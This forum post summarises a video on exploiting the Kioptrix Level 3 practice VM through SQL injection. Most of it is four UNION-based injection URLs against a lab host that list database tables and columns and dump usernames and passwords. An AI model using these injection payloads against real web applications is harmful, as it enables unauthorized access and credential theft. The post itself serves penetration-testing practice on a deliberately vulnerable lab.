Praetorian503 Posted January 22, 2013 Report Posted January 22, 2013 Description: In this video I will show you how to exploit Kioptrix Level 3 Web-Application using SQL-Injection.Kioptrix is a vulnerable web Application for penetration testing.In this demo I will cover how to exploit a web using sql-injection and finding Web admin password.http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="dev_accounts"),4,5,6http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password, 0x0A) from dev_accounts),4,5,6http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype, 0x3A, firstname, 0x3A, lastname, 0x3A, email, 0x3A, website, 0x3A, issuperuser, 0x3A, joincode) from gallarific_users),4,5,6Source : - Kioptrix Level 3 Notes *Spoiler Alert* http://www.securitytube.net/video/6708 Quote